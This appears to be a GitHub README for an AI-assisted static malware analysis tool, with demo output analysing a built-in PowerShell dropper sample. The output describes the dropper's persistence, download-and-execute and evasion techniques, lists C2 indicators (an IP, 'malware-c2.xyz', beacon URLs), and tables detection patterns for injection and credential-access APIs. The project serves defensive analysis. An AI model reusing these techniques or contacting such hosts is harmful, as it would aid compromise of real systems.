mataleon/AI-MALWARE-ANALYSIS-SANDBOX

AI Malware Analysis Sandbox 🔬 Drop a suspicious file — AI performs static analysis, maps capabilities to MITRE ATT&CK, and generates a professional threat report An AI-powered static malware analysis tool that extracts strings, suspicious API calls, IOCs, and PE headers from suspicious files — then uses Claude AI to classify the malware, map every capability to MITRE ATT&CK, and produce a detailed analyst-grade report. Files are never executed. Static analysis only. MALWARE — 94/100 — High confidence on first run. What It Does Static analysis — entropy, strings, suspicious APIs, IOC extraction PE header analysis — imports, sections, packing detection for .exe / .dll AI classification — malware family, category, threat level MITRE ATT&CK mapping — every capability mapped to specific technique IDs IOC extraction — IPs, domains, URLs, registry keys, base64 blobs Professional reports — dark-theme HTML + Markdown with threat score bar # Demo # AI MALWARE ANALYSIS SANDBOX Static Analysis · Powered by Claude AI ⚠️ Static analysis only — files are never executed Using built-in malware sample (PowerShell dropper)... [1/3] Performing static analysis... File : svchost_helper.ps1 Type : Text/Script Size : 1,477 bytes Entropy : 5.536 / 8.0 Static score : 54 / 100 Suspicious APIs : 1 Suspicious strings : 11 IOCs: 1 IPs, 1 domains, 2 URLs [2/3] Running AI analysis... Analysis complete [3/3] Saving reports... Report saved : reports/malware_report_20260525_181436.md HTML report : reports/malware_report_20260525_181436.html ────────────────────────────────────────────────── VERDICT : MALWARE AI SCORE : 94/100 STATIC SCORE : 54/100 CONFIDENCE : High ────────────────────────────────────────────────── Sample Analysis Output From the built-in PowerShell dropper sample (svchost_helper.ps1): ## EXECUTIVE SUMMARY This is a malicious PowerShell-based downloader/backdoor masquerading as a legitimate Windows system file. The script establishes persistence via registry Run keys, downloads and executes payloads from remote C2 servers, and employs multiple evasion techniques including execution policy bypass and hidden window execution. Dual C2 infrastructure and base64 obfuscation indicate a sophisticated multi-stage attack designed for long-term compromise. ## MALWARE CLASSIFICATION - Family : Backdoor/Downloader (hybrid) - Category : Commodity malware with professional-grade evasion - Threat Level: Critical ## MITRE ATT&CK MAPPING T1547.001 — Registry Run Keys / Startup Folder (persistence via CurrentVersion\Run) T1059.001 — PowerShell (script-based execution) T1027 — Obfuscated Files or Information (base64 encoding) T1140 — Deobfuscate/Decode Files or Information (FromBase64String + IEX) T1497 — Virtualization/Sandbox Evasion (VMware/VirtualBox detection) T1071.001 — Application Layer Protocol: Web (HTTP C2 via WebClient) T1105 — Ingress Tool Transfer (DownloadString for payload staging) T1036 — Masquerading (svchost_helper.ps1 mimics legitimate process) ## EXTRACTED IOCs - IP : 185.220.101.48 - Domain : malware-c2.xyz - URL : http://185.220.101.48/beacon - URL : http://malware-c2.xyz/update - Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run Project Structure ai-malware-sandbox/ ├── main.py # Entry point — orchestrates full pipeline ├── file_analyzer.py # Static analysis engine ├── malware_analyst.py # Claude AI analysis + MITRE mapping ├── report_generator.py # Dark-theme HTML + Markdown reports └── reports/ # Generated analysis reports (auto-created) Setup 1. Clone the repo bashgit clone https://github.com/yourusername/ai-malware-sandbox cd ai-malware-sandbox 2. Install dependencies bashpip install anthropic python-dotenv pefile pefile enables deep PE header analysis for Windows executables. All other formats work without it. 3. Set your API key powershell# Windows PowerShell $env:ANTHROPIC_API_KEY = "your-key-here" 4. Run bash# Test with built-in PowerShell dropper sample python main.py --sample # Analyse a real file python main.py suspicious.exe python main.py malware.ps1 python main.py dropper.js Supported File Types TypeExtensionAnalysisWindows PE.exe .dllFull PE headers, imports, sections, packingPowerShell.ps1String extraction, API detection, IOCsJavaScript.jsObfuscation detection, network IOCsVBScript.vbsSuspicious string analysisPython.pyAPI and network indicator extractionBatch.batCommand and persistence detectionShell.shLinux persistence and network indicatorsText.txtGeneric string and IOC extraction What the Static Analyzer Detects CategoryIndicatorsProcess InjectionVirtualAlloc, WriteProcessMemory, CreateRemoteThreadPersistenceRegistry Run keys, scheduled tasks, servicesEvasionIsDebuggerPresent, VM detection, Sleep, packingNetwork C2WebClient, WinHTTP, raw socket APIsCredential AccessLSA APIs, SAM database access, CryptDecryptDiscoveryEnumProcesses, CreateToolhelp32SnapshotExecutionShellExecute, CreateProcess, LoadLibraryObfuscationBase64 blobs, encoded payloads, IEX patterns Environment Variables VariableRequiredDescriptionANTHROPIC_API_KEY✅ YesYour Anthropic API key Part of a Larger Portfolio This is Project 4 in an end-to-end AI cybersecurity portfolio: #ProjectHeadline1AI SOC AnalystLive Sentinel integration2LLM Injection Defender17/17 attacks detected3AI Phishing Detector97% phishing probability4AI Malware Analysis SandboxMALWARE — 94/100 — High The Full Story Every project in this portfolio builds on real infrastructure: Honeypot deployed — 200,000+ real attacks collected Active Directory lab built — enterprise environment simulated Microsoft Sentinel configured — custom KQL detection rules AI SOC Analyst — automated Tier 1 investigation LLM Injection Defender — protects AI tools from being hijacked AI Phishing Detector — email threat analysis + IOC extraction This sandbox — static malware analysis + MITRE mapping